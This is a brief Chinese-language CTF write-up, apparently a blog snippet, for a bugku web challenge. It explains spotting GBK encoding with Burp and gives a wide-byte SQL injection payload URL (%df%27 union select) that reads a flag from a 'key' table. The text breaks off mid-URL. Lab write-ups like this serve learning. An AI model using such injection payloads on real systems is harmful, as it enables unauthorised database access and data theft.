bugku writeup web
先可以通过burp来发现是gbk编码,可以得知可能存在宽字节注入既然有提示,那么就按照提示来
查询key表,id=1的string字段
构造payloadhttp://103.238.227.13:10083/?id=1%df%27 union select 1,string from sql5.key%23得到flag~~~~有趣的是http://103.238.227.13:10083/?i
原创
2017-10-27 19:45:55 ·
632 阅读 ·
0 评论